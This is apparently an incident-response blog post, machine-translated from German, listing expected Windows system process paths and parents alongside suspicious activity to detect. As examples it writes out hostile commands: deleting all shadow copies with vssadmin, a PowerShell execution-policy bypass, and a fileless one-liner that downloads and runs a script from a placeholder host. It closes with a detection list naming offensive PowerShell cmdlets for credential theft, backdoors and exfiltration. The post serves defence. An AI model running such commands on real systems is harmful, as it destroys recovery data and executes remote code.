legal contact
 
09.08.2020 13:35

malicous commands for the incident response

What is actually always suspicious / evil:

See also: ​day-2-for508-2.html​​​


cmd.exe outside of C:\windows\system32 or c:\windows

* .exe, * .com, * .vbs, * .bat, * .dll - calls in "world writable" directories such as:

\ tmp, \ temp \, \ Users \ *, C: \ Users \ YourUserName \ Roaming, C: \ Users \ YourUserName \ Local, C: \ Users \ YourUserName \ LocalLow

Calls to fake system programs that are in the wrong place. The correct locations are as follows. Do you see a call from another directory, please:

  • Have a RAM and HDD snapshot created.
  • Contact the person responsible (or caller) and check the legitimacy of the action
  • Possibly. Isolate the called program and throw it into the SandBox
  • Possibly. Check IOCs from the SandBox in MISP and TheHive
  • Possibly. Have the machine isolated / disconnected from the network
  • Possibly. initiate forensic analysis

The above also applies in the opposite case that these programs are accessed for writing / changing outside of an update.

  • Image Path: N/A for system.exe – Not generated from an executable image
  • Parent Process: None
  • Number of Instances: One


  • Image Path: %SystemRoot%\System32\smss.exe
  • Parent Process: System
  • Number of Instances: One master instance and another child instance per session. Children exit after creating their session


  • Image Path: %SystemRoot%\System32\wininit.exe
  • Parent Process: Created by an instance of smss.exe that exits, so tools usually do not provide the parent process name.
  • Number of Instances: One


  • Image Path: %SystemRoot%\System32\RuntimeBroker.exe
  • Parent Process: svchost.exe
  • Number of Instances: One or more


  • Image Path: %SystemRoot%\System32\taskhostw.exe
  • Parent Process: svchost.exe
  • Number of Instances: One or more


  • Image Path: %SystemRoot%\System32\winlogon.exe
  • Parent Process: Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: One or more


  • Image Path: %SystemRoot%\System32\csrss.exe
  • Parent Process: Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: Two or more


  • Image Path: %SystemRoot%\System32\services.exe
  • Parent Process: wininit.exe
  • Number of Instances: One


  • Image Path: %SystemRoot%\system32\svchost.exe
  • Parent Process: services.exe (most often)
  • Number of Instances: Many (generally at least 10)


  • Image Path: %SystemRoot%\System32\lsaiso.exe
  • Parent Process: wininit.exe
  • Number of Instances: Zero or one
  • Image Path: %SystemRoot%\System32\lsass.exe
  • Parent Process: wininit.exe
  • Number of Instances: One


  • Image Path: %SystemRoot%\explorer.exe
  • Parent Process: Created by an instance of userinit.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: One or more per interactively logged-on user


Clearing the chance of evidence recognition

"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet


Powershell

Bypass PS-internal security controls by executing PS and give the script to call as parameter.

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy bypass -File "C:\windows\system32\evil.ps1"


Execute other then PS1-files:

powershell.exe –ep Bypass “& {Get-Content .\malware.ps2 | iex}


Executing directly into memory (file-less attack)

powershell.exe -ep Bypass -nop -noexit -c iex ((New ObjectNet.WebClient).DownloadString(‘https://[website]/malware.ps1′))


Detect Commandlet names from well-known PowerShell exploitation frameworks


- "*Invoke-DllInjection*"
- "*Invoke-Shellcode*"
- "*Invoke-WmiCommand*"
- "*Get-GPPPassword*"
- "*Get-Keystrokes*"
- "*Get-TimedScreenshot*"
- "*Get-VaultCredential*"
- "*Invoke-CredentialInjection*"
- "*Invoke-Mimikatz*"
- "*Invoke-NinjaCopy*"
- "*Invoke-TokenManipulation*"
- "*Out-Minidump*"
- "*VolumeShadowCopyTools*"
- "*Invoke-ReflectivePEInjection*"
- "*Invoke-UserHunter*"
- "*Find-GPOLocation*"
- "*Invoke-ACLScanner*"
- "*Invoke-DowngradeAccount*"
- "*Get-ServiceUnquoted*"
- "*Get-ServiceFilePermission*"
- "*Get-ServicePermission*"
- "*Invoke-ServiceAbuse*"
- "*Install-ServiceBinary*"
- "*Get-RegAutoLogon*"
- "*Get-VulnAutoRun*"
- "*Get-VulnSchTask*"
- "*Get-UnattendedInstallFile*"
- "*Get-ApplicationHost*"
- "*Get-RegAlwaysInstallElevated*"
- "*Get-Unconstrained*"
- "*Add-RegBackdoor*"
- "*Add-ScrnSaveBackdoor*"
- "*Gupt-Backdoor*"
- "*Invoke-ADSBackdoor*"
- "*Enabled-DuplicateToken*"
- "*Invoke-PsUaCme*"
- "*Remove-Update*"
- "*Check-VM*"
- "*Get-LSASecret*"
- "*Get-PassHashes*"
- "*Show-TargetScreen*"
- "*Port-Scan*"
- "*Invoke-PoshRatHttp*"
- "*Invoke-PowerShellTCP*"
- "*Invoke-PowerShellWMI*"
- "*Add-Exfiltration*"
- "*Add-Persistence*"
- "*Do-Exfiltration*"
- "*Start-CaptureServer*"
- "*Get-ChromeDump*"
- "*Get-ClipboardContents*"
- "*Get-FoxDump*"
- "*Get-IndexedItem*"
- "*Get-Screenshot*"
- "*Invoke-Inveigh*"
- "*Invoke-NetRipper*"
- "*Invoke-EgressCheck*"
- "*Invoke-PostExfil*"
- "*Invoke-PSInject*"
- "*Invoke-RunAs*"
- "*MailRaider*"
- "*New-HoneyHash*"
- "*Set-MacAttribute*"
- "*Invoke-DCSync*"
- "*Invoke-PowerDump*"
- "*Exploit-Jboss*"
- "*Invoke-ThunderStruck*"
- "*Invoke-VoiceTroll*"
- "*Set-Wallpaper*"
- "*Invoke-InveighRelay*"
- "*Invoke-PsExec*"
- "*Invoke-SSHCommand*"
- "*Get-SecurityPackages*"
- "*Install-SSP*"
- "*Invoke-BackdoorLNK*"
- "*PowerBreach*"
- "*Get-SiteListPassword*"
- "*Get-System*"
- "*Invoke-BypassUAC*"
- "*Invoke-Tater*"
- "*Invoke-WScriptBypassUAC*"
- "*PowerUp*"
- "*PowerView*"
- "*Get-RickAstley*"
- "*Find-Fruit*"
- "*HTTP-Login*"
- "*Find-TrustedDocuments*"
- "*Invoke-Paranoia*"
- "*Invoke-WinEnum*"
- "*Invoke-ARPScan*"
- "*Invoke-PortScan*"
- "*Invoke-ReverseDNSLookup*"
- "*Invoke-SMBScanner*"
- "*Invoke-Mimikittenz*"
- "*Invoke-AllChecks*"
false_positives:
- Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1